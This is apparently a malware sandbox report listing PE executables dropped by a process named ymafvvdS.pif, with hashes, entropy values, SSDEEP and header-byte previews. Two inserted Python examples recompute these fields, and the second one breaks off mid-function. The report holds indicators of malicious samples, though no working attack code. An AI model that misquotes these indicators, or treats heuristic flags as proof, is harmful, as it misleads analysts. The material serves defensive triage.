                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1339904
                                                                                                                                                                                                                        Entropy (8bit):7.208878269650056
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:UjKTIsAjFuvtIfmFthMaT5U8aChaeuCsqjnhMgeiCl7G0nehbGZpbD:UjIMmPh7TT79LDmg27RnWGj
                                                                                                                                                                                                                        MD5:64E3E3C8B574FFA2EDFC513EECC4505B
                                                                                                                                                                                                                        SHA1:C1B6550D0E19E4055355DF944EE6E1F9D24F5E5C
                                                                                                                                                                                                                        SHA-256:EBF2168798E4C9DFC84EE66FD3A55D2163A04AA7C0FF90DB85239CFFE14D5E2C
                                                                                                                                                                                                                        SHA-512:91C263846B3814B23BD8D2DE1902E13468019747ADC803BFDA58DEF68631676F129B41755B4A04DF2CF15A48E2D96CAC5A705331C083B10A5ECDF76B3F60A7DB
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....=w.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................
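Each record above carries the same set of per-file fields: a file-type string derived from the DOS and PE headers (PE32+, GUI or console subsystem, x86-64), a size, an 8-bit entropy value with an Encrypted flag (true only for the 59,941,376-byte file whose entropy is 7.9994), a set of cryptographic digests, and a printable preview of the first bytes. The following Python is an added example, not part of the Joe Sandbox report or of the sandbox's own tooling; it reproduces those fields from raw bytes so an analyst can re-derive them for a file pulled from a sandbox or an endpoint. The 7.9-bit cut-off used for the Encrypted flag, the header-only PE image built in memory as sample input, and all function names are assumptions of this example, not the sandbox's rules.

```python
"""Re-derive the fields of a sandbox 'dropped file' record from raw bytes.

Added example (not sandbox code). The only non-stdlib field in the report,
SSDEEP, is omitted here; the Encrypted threshold is an assumed value.
"""
import hashlib
import math
import struct
from collections import Counter

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_I386 = 0x014C
PE32PLUS_MAGIC = 0x20B
PE32_MAGIC = 0x10B
SUBSYSTEMS = {2: "GUI", 3: "console"}          # IMAGE_SUBSYSTEM_WINDOWS_GUI / _CUI
HIGH_ENTROPY_BITS = 7.9                        # assumed cut-off for "Encrypted"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests with the key names the report uses."""
    names = {"MD5": "md5", "SHA1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}
    return {k: hashlib.new(v, data).hexdigest().upper() for k, v in names.items()}


def pe_file_type(data: bytes) -> str:
    """libmagic-style description built from the DOS stub, COFF and optional headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "data"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "MS-DOS executable"
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    machine, _, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 70 or opt + 70 > len(data):
        return "PE executable (truncated optional header)"
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)   # same offset in PE32 and PE32+
    bits = {PE32PLUS_MAGIC: "PE32+", PE32_MAGIC: "PE32"}.get(magic, "PE")
    arch = {IMAGE_FILE_MACHINE_AMD64: "x86-64",
            IMAGE_FILE_MACHINE_I386: "Intel 80386"}.get(machine, f"machine 0x{machine:04x}")
    sub = SUBSYSTEMS.get(subsystem, f"subsystem {subsystem}")
    return f"{bits} executable ({sub}) {arch}, for MS Windows"


def preview(data: bytes, length: int = 64) -> str:
    """Printable preview in the report's style: non-printable bytes shown as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def dropped_file_record(data: bytes) -> dict:
    """Assemble the report-style record for one file's bytes."""
    ent = shannon_entropy(data)
    rec = {
        "File Type": pe_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": ent,
        "Encrypted": ent >= HIGH_ENTROPY_BITS,
        "Preview": preview(data),
    }
    rec.update(digests(data))
    return rec


def build_minimal_pe(subsystem: int, magic: int = PE32PLUS_MAGIC) -> bytes:
    """Constructed header-only x86-64 PE image used as sample input (not a real dropped file)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 1, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for name, blob in (("gui.bin", build_minimal_pe(2)),
                       ("console.bin", build_minimal_pe(3)),
                       ("uniform.bin", bytes(range(256)) * 4)):
        print(name)
        for k, v in dropped_file_record(blob).items():
            print(f"  {k}:{v}")
```

Two things the output makes concrete. First, the Encrypted flag is an entropy heuristic, not proof of encryption: a header-only image scores near zero, a uniformly distributed buffer scores exactly 8.0, and the report's own values (7.9994 flagged, 7.2089 not flagged) sit on either side of a threshold the example only approximates. Second, the cryptographic digests differ between any two files that differ by a single byte, so the records above are best compared through SSDEEP, which this example omits because it is not in the standard library (the python-ssdeep binding would be needed): several records above share the same SSDEEP tail, which is the indicator that the dropped files are near-identical copies despite their distinct MD5/SHA values.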

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1515520
Entropy (8bit):5.411765736209586
Encrypted:false
SSDEEP:24576:9GqVwCto1Gm5WgusqjnhMgeiCl7G0nehbGZpbD:MZ1GmUxDmg27RnWGj
MD5:FABCEFE2A13ADDD6F1A508A3BE58B4F5
SHA1:5731288C7D5785ADE22BB7B7639366DCC28EC17A
SHA-256:B54402B4F1FF4B13CCF48D4E9844805C8DCA6EC8527DFD9672762D8580DFE2BB
SHA-512:FE9AA9EE17774BBBDEE7769674DE61ECFE5D57678CF291D0F5D5AFA8FB57D8ADF1910DEC78210C5EFDD29781F87DBA5F659094FF107F122EE57EDA6F0DC23816
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1253376
Entropy (8bit):5.157394767815713
Encrypted:false
SSDEEP:12288:pWBWiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pWBWisqjnhMgeiCl7G0nehbGZpbD
MD5:7361D092BE1C71E0FCDDA8E213F16E4E
SHA1:493FFAD11F8D6BE4F6F7FBAF7940BD0352379723
SHA-256:1952821E87DA14B5F841A5D670C634C39D81D76362A718E8F47754E5F12F0D72
SHA-512:053B7B0E62CD7630A089D49B1BF2EFA9F7283531F2B4261DE0B06F2DC381F962074C252BCD3B7DDF299E768D1C9EE68B0D21DFBD29B6701CABA96BFD57309307
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1683968
Entropy (8bit):7.228476281408307
Encrypted:false
SSDEEP:24576:yf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0hsqjnhMgeiCl7G0nehbGZpbD:y+GtCi27mVTyT+a01Dmg27RnWGj
MD5:97B4BDE939C167C8E9BA1782FA4A8573
SHA1:C626D4CC7ECD27599E70EE3B1C2407576ABCDFDA
SHA-256:C3275A9BE9A9A2EDA79415E33B9A9671BEE4D4815D796A1D4886661EFD359213
SHA-512:E536C1BC3F6CB6B0C2BB1E85C5589A68FCE50B5486070A6DDE81C599493B4CC73FA8EA76D481F75D144D3F8A37A05BD24C490A534255A046E57E516E25706175
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3110912
Entropy (8bit):6.64965260973092
Encrypted:false
SSDEEP:49152:bU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeY6Dmg27RnWGj:c2NfHOIK5Ns6qR9cD527BWG
MD5:69BB1C5C221CB8903CEA9F50923C0546
SHA1:D3ED446C8F83E8D07A0341288E79937F3AD52BCB
SHA-256:B2CC2CE9D121753110FC80D501ECAAD054A0FF40B0C9496D042E5C506ADFDB5F
SHA-512:31E4257D762EBE5872BA9711FDC93E40390EFE3128F3154F2342D3364C76D8A8E6298D6FD756C9D5267A92B0D51B7910E62F2DCC89EE2DB10D325957013069EE
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1588224
Entropy (8bit):5.5319057712968815
Encrypted:false
SSDEEP:24576:pkcWTUQcyd+sqjnhMgeiCl7G0nehbGZpbD:phKU9Dmg27RnWGj
MD5:7F9378D9989C0015FAE51C16AEB2FE81
SHA1:DC92D74021FA51E53F26338EB46C6DB9B8F17B3E
SHA-256:8EF3F9CF228452CA26941DCB9EDA4354AFC20BAD614AD7F854218071A5D5E215
SHA-512:8A859C76C6980922B9C5FA7C50E1D05EC1B8F5150A323755FEC2E9615702B46F340084258F048A26C4182719FD6295AB21D386C2BB8529C5F62384987C260F64
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1338368
Entropy (8bit):5.3526400539730075
Encrypted:false
SSDEEP:12288:jfY+FUBRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jA+qBRsqjnhMgeiCl7G0nehbGZpbD
MD5:3329ABF2A42097FB6DF3863017E899A3
SHA1:272B8333D7078BB3BB791515D522EF309B868A83
SHA-256:C973E9BE19943E150851FCA8296B590C8962B9B1720BA193695257F11C620377
SHA-512:30EE141689F8A0B38E36C771B7A7E06A47AE9DD8632020734DD79D40A886E1A74CC5FE1933E64B09EE6952E2428E6B4BE8BFF4190A61773BD753E2941171457A
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1143296
Entropy (8bit):5.022669377921799
Encrypted:false
SSDEEP:12288:6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:6sqjnhMgeiCl7G0nehbGZpbD
MD5:DA0304899809F9490A7F354F897B2B71
SHA1:28BD59260782118486FCE5FB23B7F76E22C60774
SHA-256:215FC39818CB3D79D54846BA5EE4C9F6172347D0931BD66BB7D861B98CCE236E
SHA-512:B1F750D8BB9A8A61C3CB9F24A2C884BB541BB331EFA5FAEBF487808F01A63C2AE98BF69974BAD98065967CB02B6849CA62D2C891E0F79B7DB7DA4F9BC470A258
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1161728
Entropy (8bit):5.047144910090478
Encrypted:false
SSDEEP:12288:O9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CsqjnhMgeiCl7G0nehbGZpbD
MD5:297C29BEE0F6458B4F0F1F054465E6F6
SHA1:39F3FDF9F6A3E77470275A66C354EFC1B47359C0
SHA-256:696F03D238C0E2E91A74C872050ACF7872C3756EA36BAE5EE256333724C6C4B4
SHA-512:887407A6964F854FFEBD6F32DC2E47C812B2B7F6A2245D6345B0779EE4F821B0DF400A234227D8FC73BDAEF56E9092391877110C8AB9D7E7DFBE1C05EF447C2F
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.499776728228241
Encrypted:false
SSDEEP:49152:3tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755gDmg27RN:3jEIa4HIEWOc5aD527BWG
MD5:BF398BE6DBBF926D9F9EB49454C00941
SHA1:F9CCAFBD12BBB6959BBA7E589840A1B7346D3C5E
SHA-256:CDBB06E7F989093F3A4656918380538B23B2BDBB5FC1EB5AAE2A9BC86D4DC159
SHA-512:E7DA18BC4DB758A6B275A18D900861BECDF0A80273E1B811F112ABD6B39DCD9CF05A0C6609E78F4625A4CA54C79E93B29BFBD767CAD35856C91F47AE9719B263
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.999367296611338
Encrypted:true
SSDEEP:1572864:PQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:YXhwMhe6AABPiQwF6xQ22R
MD5:D368AB07D22B032923C33B734E9395AD
SHA1:6419657672DF75A4E7E1709E77FF52020A5D024F
SHA-256:A0BB062DE8F33F1A0B387CC6EEAA2920D234D0BC7F738D0C1B135FA5FCA04E24
SHA-512:C65516C064BA13ECFA1218B11487F7B4D89D69BDE91E964A481276B35B88E465535B93AC8284E91A512E054487AF1474105F334174C50E16F1EAB4B6CFB1BE5F
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1230336
Entropy (8bit):5.185589331627092
Encrypted:false
SSDEEP:12288:2ejVWYUA9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zjkY79sqjnhMgeiCl7G0nehbGZpbD
MD5:379EE1F6674E010E0ABBAE313A693DD7
SHA1:EDE2B4D2BF08DDBC5DE32F6C2271FF70D235FBC4
SHA-256:6D41AF299E5DE5328F913EAFC0BF7D26455D0C85466C4F2841B5E6FF720D9975
SHA-512:6893F6323BEF1841E679D600F268723C507B8240C29A9B8C4668AB8B46580BC7693A09BA3103A961CF9652A7CED04645053C8A2994E4A981AD863FE6A46836A5
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1384960
Entropy (8bit):5.377800243696428
Encrypted:false
SSDEEP:24576:yxwSJhkrmZspsqjnhMgeiCl7G0nehbGZpbD:yy+krKstDmg27RnWGj
MD5:7C9CC36D93794997E73896ADF1F405E8
SHA1:A5C2161F93A865C7E34CAF54A316D68F9D3DE173
SHA-256:78734CEA04DE9CF2A9B73C023BB701FE786543D17AF5BB44E2A7F707C283F262
SHA-512:A9B048F94717A5FA4B0D8A12E17E847A85CBDBF54F24E146B4CE55479CBF7A7D86B8806F4BF72ADF84B98E942C586DE4E1107C2392003A700C74FFF918606524
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1649152
Entropy (8bit):5.632721830733146
Encrypted:false
SSDEEP:24576:mHQJLIRgvsnNosqjnhMgeiCl7G0nehbGZpbD:mHQJL34UDmg27RnWGj
MD5:452F9E26024687323B68D488A5189AB5
SHA1:698815A683673B799B2AFF5DB592E66F58974D38
SHA-256:9178B13B2BA74156CD9A4906600B0CC1434E37CF4FCA137ABDEA789EF5F8361F
SHA-512:9851BBCA52F334C3D27D7FEAB9A165E19364FA03D30980EDB5AFB621C8F96225D90E02C6BDE56A4985DEB46219C8A75C14EAE66F75A63A8A84A0E1999D9E5407
Malicious:true
Reputation:unknown

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5365760
Entropy (8bit):6.450965560547796
Encrypted:false
SSDEEP:49152:wUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kn:DWmXL6DEC7dRpKuDQbgfD527BWG
MD5:D598343630EA50735931051B9824F083
SHA1:D3BE9338D1FF76033361F81BEE841E3E6F26F067
SHA-256:8D31790BA9701EFEF03CD66BB7DA4AE52AC6F23C6C9E5D107E736586B179418B
SHA-512:23591B2665AA0E876BF725AA8BD2B694474541A9A4D83249F19DE9013C1C760ED94BB7D84015A15B027EFF4640F8E47AF317FB4E93716FF7DBEBAC11014F3D65
Malicious:true
Reputation:unknown

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3163136
Entropy (8bit): 7.9727802051037235
Encrypted: false
SSDEEP: 98304:irZ23AbsK6Ro022JjL2WEiVqJZAD527BWG:MJADmmxL2WEoCZAVQBWG
MD5: A4B979481449C38A93C5EF6531D15301
SHA1: 10D3522D54F69F8E6FBD41CBF9F79DD79BEF2E91
SHA-256: C43CBFA7F83BFF8AC5DD24E4DE49226AF0EFBB610FA63420BC828BA85B3764B3
SHA-512: CEFD6C846E7DB3007312437171AB8FB2A3C835AF076927FB1176452E8AEA92391BA5C237232452210B022BB79BA96C7D91E3436C1900AFD1BB5125384E95474B
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......u0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1213440
Entropy (8bit): 7.204894655627825
Encrypted: false
SSDEEP: 24576:CfrYY42wd7hlOw9fpkEE64ZsqjnhMgeiCl7G0nehbGZpbD:bz9xrSdDmg27RnWGj
MD5: 8D8914057A818CD2331408696FA677AC
SHA1: B7136A6B8D963D87A39C25AE85D721C6DB7B42BB
SHA-256: 708E83E24070EDE95672437BED150B687D20D27279CB84DE387003A0BF428363
SHA-512: 6EEA206BB0F19077120A6593EA8465685FC9F6B560FE7E6348CB64C6C668403C412811BFEC6A9DE3E008083ED0F24349071C57FA617064C523BF593714750537
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. .......u.... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1388544
Entropy (8bit): 5.272917202867949
Encrypted: false
SSDEEP: 12288:vwkNKiZ+R2GGNUbTF5WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:vzNKUE5WsqjnhMgeiCl7G0nehbGZpbD
MD5: FFC2624B52EBFD4EBF7D9E3BD615BC70
SHA1: 8B4F093EB3319616699F9032CF4824B6F5214D94
SHA-256: 1C2638068578216040E965B0E9ADD14864AD4AA20720FC38D1B4D941D8A9B04E
SHA-512: 114C0DE4191FEDB96FADCE2DC01F0689CD7BB76B42F356C4BA2ACEAD7B775D0EFC08A08DB4538577119F91C6F4FEF5D032DC6F8098B6D64B664616196CBA8363
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P......#'.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5855744
Entropy (8bit): 6.574327140983912
Encrypted: false
SSDEEP: 98304:xALuzDKnxCp3JKNrPJzruaI6HMaJTtGbbD527BWG:KaGg3cFPIaI6HMaJTtGbbVQBWG
MD5: 77EFB5E3B328455943569E0598103B72
SHA1: 602ED429499E2A4BF500B2E57B09FC4919FDA913
SHA-256: 1C41AEC6D8F692556D948355DBF5244A337DFA13DA6189673359390F987FF1C2
SHA-512: B74C7D9F38ADEBF7DE4D8F953229AA2FD82E7C67B8EC5C6B0C621BFC697E165EF82EDD117A688A17523FF405A815E346BD8FBB83BE61B8C057178D25C3EB1367
Malicious: true
Reputation: unknown
Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1312768
Entropy (8bit): 5.3560414739981494
Encrypted: false
SSDEEP: 24576:5Xr/SVMxW1sqjnhMgeiCl7G0nehbGZpbD:V1xADmg27RnWGj
MD5: 61CEFA63E7EE27F5129C599D281B0BB5
SHA1: D537DC740C49AA57AD836AA58874F92102572E65
SHA-256: B5B49C7286DF0E34F5D582AE7552C2E62B6F35F20E3F2DF45A11D6502EE630FC
SHA-512: F148BD5888676673A7E9EC2FE9981ADB5AC7C596DBA21FC510D81C2A241C629B27A1225727228A1BD1E4D78B9F65E975899DA333B510CC3DF48AA0942DEBC56D
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P................... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 27533312
Entropy (8bit): 6.248635620725209
Encrypted: false
SSDEEP: 196608:phRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOvVQBWG:phRCpGpMJMrbp8JjpNdNlc5dB
MD5: 8366F894666E016B5532B9406EB4A90B
SHA1: 5E4BF99FF01723F88817F48E63C1DD23A334839B
SHA-256: E1CA49E666C0A6753F9D24D43BC33CD4A13165F670C38456608539FDA344711A
SHA-512: B07CCE2395ED55A7C1A9DA512FB8C60A4DF158622A3773E7E78767C08C3D3E1A4B79FBDEAB3A28AD65F0C2E0F7F63F432F617BC33690CA0AF06FB0D94D53BA15
Malicious: true
Reputation: unknown
Preview: MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................X/.... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2199552
Entropy (8bit): 6.788991366078409
Encrypted: false
SSDEEP: 49152:j83pZ3kd0CuEeN0LUmRXzYs65mXDmg27RnWGj:zKuUQY15kD527BWG
MD5: 7B53E1DCF6EB15F86FBA53A37F239978
SHA1: 3F4E27861F04AB48BDE341ADF2BAFBF7235B29DC
SHA-256: 514804FED7FA0BFBF58162875B6EA8C91D4F550AF2ECA9C9E6082C2447EA1FEF
SHA-512: 2AE72DB3ADA492590F0D75DDC272ECE377DECE5249E281799318E88E61D2BD442FB218E88F435CA3FE01D806B7A33E1F92DCAABCF91F85369561857AD849BD0D
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................
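Each dropped-file record above carries the fields an analyst uses to triage and pivot: the four digests (for lookups and blocklists), the 8-bit Shannon entropy (a 3 MB PE at 7.97 bits/byte is what a compressed or encrypted payload looks like, regardless of the separate Encrypted flag), and a printable-ASCII preview of the first bytes, in which the MZ/PE markers, the Rich header and the section names (.text, .rdata, .didat, .detourc) are readable. The script below, an added example that is not Joe Sandbox's code, recomputes those fields for a file so the report values can be cross-checked against a locally obtained copy of the dropped file, and additionally walks the PE section table instead of eyeballing names in the preview. The sample input is a constructed, minimal PE-shaped byte string (not a real executable); the preview rendering rule (0x20..0x7E kept, everything else as '.', first 1024 bytes) is an assumption about how the report's Preview column is produced.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), i.e. the report's "Entropy (8bit)".
    Values near 8.0 mean near-uniform bytes: packed, compressed or encrypted content."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same four algorithms the report lists."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def preview(data: bytes, length: int = 1024) -> str:
    """Printable-ASCII rendering of the leading bytes.
    Assumption (ours, not documented by the sandbox): 0x20..0x7E kept, all else '.'."""
    return "".join(chr(b) if 0x20 <= b <= 0x7E else "." for b in data[:length])


def is_pe(data: bytes) -> bool:
    """MZ signature, then follow e_lfanew (offset 0x3C) to the PE\\0\\0 signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def section_names(data: bytes) -> list:
    """Section names from the COFF section table (40-byte entries, 8-byte name field).
    Layout used: COFF header at e_lfanew+4, NumberOfSections at +2,
    SizeOfOptionalHeader at +16, section table at +20+SizeOfOptionalHeader."""
    if not is_pe(data):
        return []
    coff = int.from_bytes(data[0x3C:0x40], "little") + 4
    n_sections = int.from_bytes(data[coff + 2:coff + 4], "little")
    opt_size = int.from_bytes(data[coff + 16:coff + 18], "little")
    table = coff + 20 + opt_size
    names = []
    for i in range(n_sections):
        raw = data[table + i * 40:table + i * 40 + 8]
        if len(raw) < 8:
            break  # truncated section table: stop rather than misparse
        names.append(raw.rstrip(b"\x00").decode("ascii", errors="replace"))
    return names


def summarize(data: bytes) -> dict:
    """Report-style record for one file, plus the parsed section list."""
    record = {"Size (bytes)": len(data),
              "Entropy (8bit)": shannon_entropy_8bit(data),
              "Is PE": is_pe(data),
              "Sections": section_names(data),
              "Preview": preview(data)}
    record.update(digests(data))
    return record


def build_sample() -> bytes:
    """Constructed PE32-shaped bytes (DOS header, PE/COFF headers, two sections,
    1 KiB of uniform padding). Not executable; for exercising the functions above."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)           # 64-byte DOS header
    dos[0x3C:0x40] = (0x80).to_bytes(4, "little")      # e_lfanew -> PE header at 0x80
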